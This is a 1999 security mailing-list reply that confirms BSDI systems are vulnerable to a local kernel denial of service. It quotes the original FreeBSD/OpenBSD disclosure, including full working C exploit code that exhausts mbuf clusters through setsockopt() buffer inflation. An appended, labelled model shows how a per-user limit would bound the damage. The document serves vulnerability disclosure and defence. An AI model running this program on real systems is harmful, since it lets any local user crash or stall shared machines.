Re: Local DoS on network by unprivileged user using setsockopt()

From: John N Dvorak (dvorakat_private)
Date: Fri Sep 03 1999 - 06:47:18 PDT


    Just verified all versions of BSDI in my possession (2.1, 3.1, 4.0, 4.01)
    are vulnerable. I do not have all the details, but the kernel panics.
    The system eventually reboots in 2.1.
    
    Can be executed by any non-privileged user.
    
    JD
    
    On Wed, 1 Sep 1999, Sven Berkvens wrote:
    
    >Recently, I mailed this mailing to a number of people who are concerned
    >with security of various OSes, like FreeBSD, OpenBSD and NetBSD. The
    >mailing was NOT intended to be made public, but somehow it was. Here is
    >my original mailing:
    >
    >
    >--- Forwarded ---
    >
    >I stumbled across a denial of service attack on FreeBSD systems, where
    >an unprivileged user can panic the kernel. Quick and dirty testing
    >(code attached at the end of this mail) showed OpenBSD is vulnerable
    >too:
    >
    >FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
    >test it on older FreeBSD versions.
    >
    >OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192:
    >The kernel logs one "/bsd: mb_map full" and all processes trying to send
    >something over the network get stuck waiting in mbuf. Locally the system
    >continues to function. Tested by a friend.
    >
    >NetBSD: Not available, but it is highly probable that the affected code
    >in OpenBSD is from its parent NetBSD.
    >
    >As far as I'm concerned, this can be handled quietly and without much
    >haste. Knowledge of this problem is limited and there is absolutely no
    >intention of publishing this exploit or messages to Bugtraq.
    >
    >With kind regards,
    >Sven Berkvens (svenat_private)
    >Long time FreeBSD-system administrator
    >
    >
    >
    >The source code for the program that causes this:
    >
    >/* Loop until socketpair() fails: each pass asks for oversized send and
    > * receive buffers on both ends of an AF_UNIX pair, then fills them with
    > * non-blocking writes. */
    >#include	<unistd.h>
    >#include	<stdlib.h>
    >#include	<sys/socket.h>
    >#include	<fcntl.h>
    >
    >#define		BUFFERSIZE	204800
    >
    >int
    >main(void)
    >{
    >	int		p[2], i;
    >	char		crap[BUFFERSIZE];	/* contents never matter; left uninitialised */
    >
    >	while (1)
    >	{
    >		if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
    >			break;	/* descriptor limit reached or resources gone */
    >		i = BUFFERSIZE;
    >		/* request BUFFERSIZE-byte buffers in both directions on both ends */
    >		setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
    >		setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
    >		setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
    >		setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
    >		/* non-blocking so a full buffer does not stall the loop */
    >		fcntl(p[0], F_SETFL, O_NONBLOCK);
    >		fcntl(p[1], F_SETFL, O_NONBLOCK);
    >		/* each write lands in the peer end's receive buffer */
    >		write(p[0], crap, BUFFERSIZE);
    >		write(p[1], crap, BUFFERSIZE);
    >	}
    >	exit(0);
    >}
    >
    >----- End forwarded message -----
    >
    
    ===========================================
    John N Dvorak | dvorakat_private
    Director of Technology
    CapuNet, LLC - Corporate Internet Solutions
    (301) 881-4900 x8018
    ===========================================
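    Added example (not part of either mail above): a small model of the resource accounting behind the reported failure, showing how the quoted loop drains a pool of NMBCLUSTERS mbuf clusters, and how a per-user limit on reserved socket-buffer bytes would bound the damage. The 2 KB cluster size, the 8 KB default socket buffer, the 512-pair descriptor limit and the per-user cap itself are assumptions for illustration, not the behaviour or fix of any particular BSD release.

```c
#include <stdio.h>
#define CLUSTER_SIZE    2048    /* assumed mbuf cluster size (bytes) */
#define DEFAULT_SOCKBUF 8192    /* assumed default socket buffer size */
#define BUFFERSIZE      204800  /* size requested by the quoted program */
struct outcome {
    int  pairs_created;  /* socket pairs set up before the loop stopped */
    int  pool_exhausted; /* 1 if the cluster pool ran dry ("mb_map full") */
    long clusters_used;  /* clusters consumed when the loop stopped */
};
/* Clusters needed to hold a buffer of the given size. */
static long clusters_for(long bytes)
{
    return (bytes + CLUSTER_SIZE - 1) / CLUSTER_SIZE;
}
/* Model the quoted loop against a pool of nmbclusters clusters. per_uid_cap
 * is an illustrative per-user limit on reserved socket-buffer bytes (0 = no
 * limit, the behaviour reported in the thread); max_pairs is how many
 * socketpair() calls succeed before the descriptor limit stops the loop. */
struct outcome run_loop(long nmbclusters, long per_uid_cap, int max_pairs)
{
    struct outcome out = { 0, 0, 0 };
    long reserved = 0;  /* bytes this user has reserved via setsockopt() */
    while (out.pairs_created < max_pairs) {
        long bufsize = BUFFERSIZE;
        /* four setsockopt() calls ask for BUFFERSIZE each; if the cap refuses
         * them, the default size stays in force for that pair */
        if (per_uid_cap > 0 && reserved + 4L * BUFFERSIZE > per_uid_cap)
            bufsize = DEFAULT_SOCKBUF;
        else
            reserved += 4L * BUFFERSIZE;
        /* one non-blocking write per end fills the peer's receive buffer */
        long need = 2 * clusters_for(bufsize);
        if (out.clusters_used + need > nmbclusters) {
            out.pool_exhausted = 1;  /* the next allocation would fail */
            break;
        }
        out.clusters_used += need;
        out.pairs_created++;
    }
    return out;
}

int main(void)
{
    struct outcome a = run_loop(8192, 0, 512), b = run_loop(8192, 4L << 20, 512);
    printf("no cap:    %d pairs, %ld clusters, exhausted=%d\n", a.pairs_created, a.clusters_used, a.pool_exhausted);
    printf("4 MiB cap: %d pairs, %ld clusters, exhausted=%d\n", b.pairs_created, b.clusters_used, b.pool_exhausted);
    return 0;
}
```

    With NMBCLUSTERS=8192 and no limit, the pool is empty after 40 pairs; with the assumed 4 MiB per-user cap, all 512 pairs complete and only 5056 clusters are in use, so the bound on damage comes from the cap times the descriptor limit.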
    